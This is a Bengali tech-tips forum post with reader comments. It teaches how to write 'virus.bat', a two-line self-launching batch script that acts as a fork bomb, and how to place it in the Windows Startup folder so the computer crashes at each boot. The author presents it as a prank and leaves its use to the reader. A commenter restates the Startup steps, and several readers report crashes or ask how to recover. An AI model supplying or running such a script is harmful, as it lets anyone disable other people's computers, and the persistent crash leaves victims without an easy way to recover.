নোটপ্যাড যাদু – পর্ব (৫)

টিউন বিভাগ টিপস এন্ড ট্রিকস
প্রকাশিত
জোসস করেছেন

আজকে আপনাদের যে নোটপ্যাড ট্রিকসটি শেখাবো তা দিয়ে আপনি খুব সহজে একটি কম্পিউটারকে crash করতে পারবেন। যদি কাজ না হয় তবে আমাকে জানাতে পারেন আর যদি কাজ হয় তাহলে তো আপনার ব্যাপার আপনি কি করবেন।

নোটপ্যাড দিয়ে crash করুন কম্পিউটার

  • ১. নোট প্যাড ওপেন করুন।
  • ২. নিম্নলিখিত লাইন কপি করুন বা টাইপ করুন।
  • start virus.bat
    virus.bat
    এবার এটাকে virus.bat লিখে ডেক্সটপে সেভ করুন।
    এবার আপনাকে আসল কাজটি করতে হবে virus.bat ফাইলটিকে ক্লিক করে টেনে start তারপর all programs তারপর startup গিয়ে ছেড়ে দিন।

    trick.JPG

    এরপর যখন কম্পিউটার আবার চালু করেবন তখন শুধু দেখবেন আপনার কম্পিউটারটি কি ভাবে crash হয়।

    Level New

    আমি মঈনুল হক। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 16 বছর যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 159 টি টিউন ও 299 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

    সব সময় নতুন কিছু শিখতে চেষ্টা করি ..........


    টিউনস


    আরও টিউনস


    টিউনারের আরও টিউনস


    টিউমেন্টস

    মঈন ভাই (নোটপ্যাড জাদুকর) আপনি তো একের পর এক জাদু দেখিয়েই চলেছেন। তবে আমার মনে হয় এই ক্রাশ ফ্রাশ এর জাদু না দেখানোই ভালো। অবশ্য সব কিছুই জেনে রাখা ভালো। তবে ভালো জাদু গুলো শেষ হলে এসব দেখানো যায়। আমার তো মনে হয় না নোট প্যাডের সব ভালো যাদু গুলো আপনি দেখিয়ে শেষ করেছেন (কারন এত অজস্র সঙ্খ্যার যাদু লিখে শেষ করার মত সময় আমার আপনার কারোরই আছে কিনা সন্দেহ)। তবে ভাই যাদুর পাশাপাশি, কেন এই সব ঘটছে অর্থাৎ বিহাইন্ড দি ম্যাজিক এ কি ঘটছে, সে সব জানালে আমার মনে হয় সবাই আরও বেশী উপকৃত হবে। আপনার টিউন এর জন্য অনেক ধন্যবাদ।

      @সুমনআপনারা কেন যে এসব কুবুদ্ধি দিয়ে লোকের কম্পিউটার নষ্ট করিয়ে দেন। এসব ভাইরাস আর যাদু আর দেখাবেন না প্লিজ। এসব যাদু দেখার ইচ্ছা আমাদের নেই।

    Level 0

    অসাধারন…… !

    Level 0

    আমার কম্পিউটার ক্র্যশ করেছে… কি মজা !

    Level 0

    Atar modde ki opokarita ase ta amar jana nai. Tobe Joss Hoise

    Level 0

    গুরু (শাকিল ভাই) আমি তৈরী করেছি কিন্তু কাজ হচ্ছে না কিভাবে setup এ নিব। Plz জানান গুরু ।

    Level New

    @ Almaraj ভাই টিউনটা আমি করেছি শাকিল ভাই নয়।যা হোক আপনি যখন আপনার গুরু কাছ থেকে জানতে চাচ্ছেন তখন আর আমার কোন কিছু বলার দরকার নেই।আর হ্যা টিউনটা ভাল ভাবে পড়লেই বুঝতে পারবেন কিভাবে startup নিবেন।

    (হা হা হা হাঃ-)) @ মঈন ভাই… Almaraj ভাই মনে হয় খেয়াল করেন নি যে এই টিউন টা উনার গুরু নয় আপনি ই করেছেন… যায় হোক ধন্যবাদ টিউন এর জন্য।
    আর @ Almaraj আপনি মনে হয় তো জানেন যে কোন টিউন এ কমেন্ট করলে তা ঐ টিউনার এর মেইল এ্যাড্রেস এ চলে যায়। সুতরাং আপনি যদি আপনার গুরুর মেইল এ্যাড্রেস এ মেইল করেন তা হলে আপনার কাঙ্ক্ষিত সমাধান পেতে পারেন।
    যায় হোক তারপরো আপনার সমাধান টা বলেই দিলাম… মাউস দিয়ে ড্রাগ করে নিয়ে যেতে পারেন। এই সহজ কাজটা যদি না পারেন তা হলে virus.bat ফাইল টা কপি করে… Start মেনুর উপর রাইট্‌ ক্লিক করে ওপেন্‌ করুন তারপর Programs>Startup ফোল্ডার এ গিয়ে আপনার virus.bat ফাইল টি পেস্ট্‌ করে দিন। আশা করি বুঝতে পেরেছেন। তবে আমি দুঃখিত যে আমি আপনার গুরু না হওয়া সত্ত্বেও সমাধান করে দিলাম (হা হা হা হাঃ-))

    Level 2

    ভাই ক্রাশ করার পর কেমনে সারামু????

    Level 0

    ক্রাশ করে ফেললে আমার কম্পিউটারের কি কি ক্ষতি হতে পারে? এবং এটি কিভাবে আমি আবার ঠিক করতে পারি, জানালে ভাল হত না কি?

    Level 0

    http://www.Linkinworld.com ভাই আপনাকে ধন্যবাদ কিন্তু আপনাকে বলব শাকিল ভাই কে net line এ গুরু মানি তাই তাকে অনুরোধ করেছি। Clear ha !

    Level New

    @ opurna এই টিউনটা পড় https://www.techtunes.io/featured/tune-id/2001

    Level 0

    ok. but crash korle ki sudho c drive crash hobe naki amr pora hard disk ….?

    Level 0

    মঈন ভাই কি দিলেন কাজ হয় না কে ? আমার কম্পিউটার ক্রাশ হয় না কে ?

    Level New

    @ Almaraj আপনি যদি উপরের টিউনের নিয়মে করে থাকেন তবে তো কাজ করার কথা আর যদি না করে একটু বিস্তারিত জানান যে আপনি কি ভাবে কি করলেন।

    Level 0

    at first I have written

    start virus.bat
    virus.bat

    then save it as “virus.bat” then drag and paste it on start> all programs> setup (shortcut to virus)

    Level 0

    মঈন ভাই এখন কি করব।

    Level 0

    Plz মঈন ভাই বলেন এখন কি করব।